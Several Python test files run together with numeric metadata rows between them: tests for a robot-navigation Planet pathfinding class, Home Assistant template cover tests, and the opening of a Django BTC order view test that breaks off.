Planet:
+--+
| |
+-0,3------+
| |
0,2-----2,2 (target)
| /
+-0,1 /
| | /
+-0,0-1,0
|
(start)
Instantiates the planet data structure and fills it with paths
MODEL YOUR TEST PLANET HERE (if you'd like):
"""
# set your data structure
self.planet = Planet()
# ADD YOUR PATHS HERE:
# self.planet.add_path(...)
'''
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
'''
def test_add_paths(self):
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
pprint.pprint(self.planet.planetKarte)
def test_get_paths(self):
self.planet.get_paths()
pprint.pprint(self.planet.planetPaths)
"""
print(sorted(self.planet.planetPaths))
print(list(range(0,10)))
l = [(1, 5),(2,5),(3,5)]
for k,v in l:
print(k, v)
for s,v, in self.planet.planetPaths.items():
print("!")
print(s)
#print(v)
for k,v in self.planet.planetPaths.get(s).items():
print(s, v[0], v[2])
#print(v)
"""
def test_integrity(self):
# were all paths added correctly to the planet
# check if add_path() works by using get_paths()
self.assertEqual(self.planet.get_paths(),
{(0, 0): { Direction.NORTH : ((0, 1), Direction.SOUTH , 1),
Direction.EAST : ((1, 0), Direction.WEST , 1),
Direction.WEST : ((0, 1), Direction.WEST , 2)},
(0, 1): { Direction.NORTH : ((0, 2), Direction.SOUTH , 1),
Direction.SOUTH : ((0, 0), Direction.NORTH , 1),
Direction.WEST : ((0, 0), Direction.WEST , 2)},
(0, 2): { Direction.NORTH : ((0, 3), Direction.SOUTH , 1),
Direction.EAST : ((2, 2), Direction.WEST , 2),
Direction.SOUTH: ((0, 1), Direction.NORTH, 1)},
(0, 3): { Direction.NORTH : ((0, 3), Direction.WEST , 2),
Direction.EAST: ((2, 2), Direction.NORTH , 3),
Direction.SOUTH : ((0, 2), Direction.NORTH , 1),
Direction.WEST: ((0, 3), Direction.NORTH , 2)},
(1, 0): { Direction.NORTH: ((2, 2), Direction.SOUTH , 3),
Direction.WEST : ((0, 0), Direction.EAST , 1)},
(2, 2): { Direction.NORTH : ((0, 3), Direction.EAST , 3),
Direction.SOUTH : ((1, 0), Direction.NORTH , 3),
Direction.WEST : ((0, 2), Direction.EAST, 2)}})
#self.fail('implement me!')
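# The integrity check above pins down the storage contract of add_path: each
# call registers the path under *both* endpoints. A minimal sketch of the
# method under that assumption (planetKarte is the map printed in
# test_add_paths; the dict-of-dicts layout is inferred, not confirmed):
#     def add_path(self, start, target, weight):
#         (start_node, start_dir), (target_node, target_dir) = start, target
#         self.planetKarte.setdefault(start_node, {})[start_dir] = (target_node, target_dir, weight)
#         self.planetKarte.setdefault(target_node, {})[target_dir] = (start_node, start_dir, weight)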
def test_empty_planet(self):
self.assertEqual(self.planet.shortest_path((0, 0), (1, 2)), [])
def test_target_not_reachable(self):
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
self.assertEqual(self.planet.shortest_path((0, 0), (1, 2)), [])
#self.fail('implement me!')
def test_shortest_path(self):
# at least 2 possible paths
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 2)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
#self.planet.get_paths()
self.assertEqual(self.planet.shortest_path((0, 0), (2, 2)), [((0, 0), Direction.EAST), ((1, 0), Direction.NORTH)])
#print(self.planet.planetPaths.items())
#self.fail('implement me!')
def test_same_length(self):
# at least 2 possible paths with the same weight
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 4)
# `or` between two non-empty lists always yields the first operand, so the
# original assertEqual could never accept the second route; assertIn checks
# that the computed path matches either of the two equally weighted routes.
self.assertIn(self.planet.shortest_path((0, 0), (2, 2)),
[[((0, 0), 0), ((0, 1), 0), ((0, 2), 90)], [((0, 0), 90), ((1, 0), 0)]])
#self.fail('implement me!')
def test_shortest_path_with_loop(self):
# does the shortest path algorithm loop infinitely?
# there is a shortest path
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 5)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
self.assertEqual(self.planet.shortest_path((0,2),(2,2,)), [((0,2), 0), ((0,3), 90)])
#self.fail('implement me!')
def test_target_not_reachable_with_loop(self):
#there is no shortest path
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 1), Direction.EAST), ((1, 1), Direction.WEST), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((1, 0), Direction.EAST), 1)
self.planet.add_path(((1, 0), Direction.NORTH), ((1,1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.NORTH), ((1,1), Direction.SOUTH), 2)
self.planet.add_path(((0, 1), Direction.EAST), ((1, 0), Direction.WEST), 2)
self.planet.add_path(((0,0), Direction.WEST), ((0,0), Direction.NORTH), 1)
self.assertEqual(self.planet.shortest_path((0, 0), (5,5)), [])
#self.fail('implement me!')
def test_target_not_reachable_blocked(self):
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), -1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
#self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
#self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
self.assertEqual(self.planet.shortest_path((0, 0), (0,3)), [])
def test_target_not_reachable_blocked_with_loop(self):
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), 1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), -1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 0), Direction.WEST), 1)
# self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
self.assertEqual(self.planet.shortest_path((0, 0), (0, 3)), [])
def test_shortest_path_with_blocked(self):
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), 1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.planet.add_path(((0, 0), Direction.EAST), ((1, 0), Direction.WEST), -1)
self.planet.add_path(((0, 1), Direction.NORTH), ((0, 2), Direction.SOUTH), -1)
self.planet.add_path(((0, 2), Direction.NORTH), ((0, 3), Direction.SOUTH), 1)
self.planet.add_path(((0, 2), Direction.EAST), ((2, 2), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.NORTH), ((0, 3), Direction.WEST), 2)
self.planet.add_path(((0, 3), Direction.EAST), ((2, 2), Direction.NORTH), 3)
self.planet.add_path(((1, 0), Direction.NORTH), ((2, 2), Direction.SOUTH), 3)
pass
def test_add_path_twice(self):
# at least 2 possible paths
self.planet.add_path(((0, 0), Direction.NORTH), ((0, 1), Direction.SOUTH), -1)
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
self.assertEqual(self.planet.planetPaths, self.planet.get_paths())
# self.planet.get_paths()
print(self.planet.planetPaths)
def test_add_path_bidirectional(self):
self.planet.add_path(((0, 0), Direction.WEST), ((0, 1), Direction.WEST), 2)
map_test = {(0,0):{Direction.WEST: ((0,1), Direction.WEST, 2)},
(0,1): {Direction.WEST: ((0,0), Direction.WEST, 2)}
}
self.assertEqual(self.planet.get_paths(), map_test)
if __name__ == "__main__":
unittest.main()
| 48.537367
| 135
| 0.559425
| 1,899
| 13,639
| 3.92891
| 0.056872
| 0.160836
| 0.163785
| 0.21418
| 0.875084
| 0.842246
| 0.809141
| 0.783809
| 0.720145
| 0.686369
| 0
| 0.061977
| 0.238141
| 13,639
| 280
| 136
| 48.710714
| 0.656049
| 0.113645
| 0
| 0.537931
| 0
| 0
| 0.000754
| 0
| 0
| 0
| 0
| 0
| 0.075862
| 1
| 0.110345
| false
| 0.02069
| 0.02069
| 0
| 0.144828
| 0.027586
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b786b463dadbabdac6a3dd8afcda884ea3a1cb95
| 27,707
|
py
|
Python
|
tests/components/cover/test_template.py
|
robin13/home-assistant
|
4976569e304c23975d34ec88e2dfb94e84ab1f1c
|
[
"Apache-2.0"
] | 37
|
2018-05-22T07:17:26.000Z
|
2022-03-03T13:14:46.000Z
|
tests/components/cover/test_template.py
|
robin13/home-assistant
|
4976569e304c23975d34ec88e2dfb94e84ab1f1c
|
[
"Apache-2.0"
] | 125
|
2018-12-11T07:31:20.000Z
|
2021-07-27T08:20:03.000Z
|
tests/components/cover/test_template.py
|
robin13/home-assistant
|
4976569e304c23975d34ec88e2dfb94e84ab1f1c
|
[
"Apache-2.0"
] | 8
|
2018-05-30T20:05:26.000Z
|
2021-02-19T14:17:05.000Z
|
"""The tests the cover command line platform."""
import logging
import unittest
from homeassistant.core import callback
from homeassistant import setup
import homeassistant.components.cover as cover
from homeassistant.const import STATE_OPEN, STATE_CLOSED
from tests.common import (
get_test_home_assistant, assert_setup_component)
_LOGGER = logging.getLogger(__name__)
class TestTemplateCover(unittest.TestCase):
"""Test the cover command line platform."""
hass = None
calls = None
# pylint: disable=invalid-name
def setup_method(self, method):
"""Initialize services when tests are started."""
self.hass = get_test_home_assistant()
self.calls = []
@callback
def record_call(service):
"""Track function calls.."""
self.calls.append(service)
self.hass.services.register('test', 'automation', record_call)
def teardown_method(self, method):
"""Stop everything that was started."""
self.hass.stop()
def test_template_state_text(self):
"""Test the state text of a template."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ states.cover.test_state.state }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.set('cover.test_state', STATE_OPEN)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_OPEN
state = self.hass.states.set('cover.test_state', STATE_CLOSED)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_CLOSED
def test_template_state_boolean(self):
"""Test the value_template attribute."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ 1 == 1 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_OPEN
def test_template_position(self):
"""Test the position_template attribute."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ states.cover.test.attributes.position }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.set('cover.test', STATE_CLOSED)
self.hass.block_till_done()
entity = self.hass.states.get('cover.test')
attrs = dict()
attrs['position'] = 42
self.hass.states.set(
entity.entity_id, entity.state,
attributes=attrs)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') == 42.0
assert state.state == STATE_OPEN
state = self.hass.states.set('cover.test', STATE_OPEN)
self.hass.block_till_done()
entity = self.hass.states.get('cover.test')
attrs['position'] = 0.0
self.hass.states.set(
entity.entity_id, entity.state,
attributes=attrs)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') == 0.0
assert state.state == STATE_CLOSED
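# The assertions above rely on the template cover's position-to-state rule:
# a position of exactly 0 reports STATE_CLOSED, anything greater reports
# STATE_OPEN. A minimal sketch of that mapping (hypothetical helper, not the
# component's actual code):
#     def state_from_position(position):
#         return STATE_CLOSED if float(position) == 0 else STATE_OPEN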
def test_template_tilt(self):
"""Test the tilt_template attribute."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ 1 == 1 }}",
'tilt_template':
"{{ 42 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') == 42.0
def test_template_out_of_bounds(self):
"""Test template out-of-bounds condition."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ -1 }}",
'tilt_template':
"{{ 110 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') is None
assert state.attributes.get('current_position') is None
def test_template_mutex(self):
"""Test that only value or position template can be used."""
with assert_setup_component(0, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ 1 == 1 }}",
'position_template':
"{{ 42 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
'icon_template':
"{% if states.cover.test_state.state %}"
"mdi:check"
"{% endif %}"
}
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_template_open_or_position(self):
"""Test that at least one of open_cover or set_position is used."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ 1 == 1 }}",
}
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_template_open_and_close(self):
"""Test that if open_cover is specified, close_cover is too."""
with assert_setup_component(0, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ 1 == 1 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
},
}
}
})
self.hass.start()
self.hass.block_till_done()
assert self.hass.states.all() == []
def test_template_non_numeric(self):
"""Test that tilt_template values are numeric."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ on }}",
'tilt_template':
"{% if states.cover.test_state.state %}"
"on"
"{% else %}"
"off"
"{% endif %}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') is None
assert state.attributes.get('current_position') is None
def test_open_action(self):
"""Test the open_cover command."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ 0 }}",
'open_cover': {
'service': 'test.automation',
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_CLOSED
cover.open_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
assert len(self.calls) == 1
def test_close_stop_action(self):
"""Test the close-cover and stop_cover commands."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ 100 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'test.automation',
},
'stop_cover': {
'service': 'test.automation',
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_OPEN
cover.close_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
cover.stop_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
assert len(self.calls) == 2
def test_set_position(self):
"""Test the set_position command."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'input_number', {
'input_number': {
'test': {
'min': '0',
'max': '100',
'initial': '42',
}
}
})
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ states.input_number.test.state | int }}",
'set_cover_position': {
'service': 'input_number.set_value',
'entity_id': 'input_number.test',
'data_template': {
'value': '{{ position }}'
},
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.set('input_number.test', 42)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_OPEN
cover.open_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') == 100.0
cover.close_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') == 0.0
cover.set_cover_position(self.hass, 25,
'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') == 25.0
def test_set_tilt_position(self):
"""Test the set_tilt_position command."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ 100 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
'set_cover_tilt_position': {
'service': 'test.automation',
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
cover.set_cover_tilt_position(self.hass, 42,
'cover.test_template_cover')
self.hass.block_till_done()
assert len(self.calls) == 1
def test_open_tilt_action(self):
"""Test the open_cover_tilt command."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ 100 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
'set_cover_tilt_position': {
'service': 'test.automation',
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
cover.open_cover_tilt(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
assert len(self.calls) == 1
def test_close_tilt_action(self):
"""Test the close_cover_tilt command."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ 100 }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
'set_cover_tilt_position': {
'service': 'test.automation',
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
cover.close_cover_tilt(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
assert len(self.calls) == 1
def test_set_position_optimistic(self):
"""Test optimistic position mode."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'set_cover_position': {
'service': 'test.automation',
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') is None
cover.set_cover_position(self.hass, 42,
'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_position') == 42.0
cover.close_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_CLOSED
cover.open_cover(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.state == STATE_OPEN
def test_set_tilt_position_optimistic(self):
"""Test the optimistic tilt_position mode."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'position_template':
"{{ 100 }}",
'set_cover_position': {
'service': 'test.automation',
},
'set_cover_tilt_position': {
'service': 'test.automation',
},
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') is None
cover.set_cover_tilt_position(self.hass, 42,
'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') == 42.0
cover.close_cover_tilt(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') == 0.0
cover.open_cover_tilt(self.hass, 'cover.test_template_cover')
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('current_tilt_position') == 100.0
def test_icon_template(self):
"""Test icon template."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ states.cover.test_state.state }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
'icon_template':
"{% if states.cover.test_state.state %}"
"mdi:check"
"{% endif %}"
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('icon') == ''
state = self.hass.states.set('cover.test_state', STATE_OPEN)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes['icon'] == 'mdi:check'
def test_entity_picture_template(self):
"""Test icon template."""
with assert_setup_component(1, 'cover'):
assert setup.setup_component(self.hass, 'cover', {
'cover': {
'platform': 'template',
'covers': {
'test_template_cover': {
'value_template':
"{{ states.cover.test_state.state }}",
'open_cover': {
'service': 'cover.open_cover',
'entity_id': 'cover.test_state'
},
'close_cover': {
'service': 'cover.close_cover',
'entity_id': 'cover.test_state'
},
'entity_picture_template':
"{% if states.cover.test_state.state %}"
"/local/cover.png"
"{% endif %}"
}
}
}
})
self.hass.start()
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes.get('entity_picture') == ''
state = self.hass.states.set('cover.test_state', STATE_OPEN)
self.hass.block_till_done()
state = self.hass.states.get('cover.test_template_cover')
assert state.attributes['entity_picture'] == '/local/cover.png'
| 38.216552
| 78
| 0.431768
| 2,269
| 27,707
| 5.009255
| 0.059057
| 0.09854
| 0.089741
| 0.064315
| 0.860197
| 0.843569
| 0.827028
| 0.819462
| 0.813919
| 0.813479
| 0
| 0.007147
| 0.459631
| 27,707
| 724
| 79
| 38.269337
| 0.752004
| 0.033674
| 0
| 0.703642
| 0
| 0
| 0.212209
| 0.059243
| 0
| 0
| 0
| 0
| 0.129139
| 1
| 0.036424
| false
| 0
| 0.011589
| 0
| 0.05298
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b7919cd97bca1692d94d13d58a2a1b9fc54dfab0
| 2,146
|
py
|
Python
|
trader/core/tests/test_view_orders.py
|
CryptTrader/CryptTrader
|
47a87923efd976281c154f898e1b01a8e449a9f8
|
[
"MIT"
] | null | null | null |
trader/core/tests/test_view_orders.py
|
CryptTrader/CryptTrader
|
47a87923efd976281c154f898e1b01a8e449a9f8
|
[
"MIT"
] | null | null | null |
trader/core/tests/test_view_orders.py
|
CryptTrader/CryptTrader
|
47a87923efd976281c154f898e1b01a8e449a9f8
|
[
"MIT"
] | null | null | null |
from django import test
from django.shortcuts import resolve_url as r
from trader.core.models import User, BillingAccount, BTCSellOrder, BTCBuyOrder
class BTCSellOrderViewTest(test.TestCase):
def setUp(self):
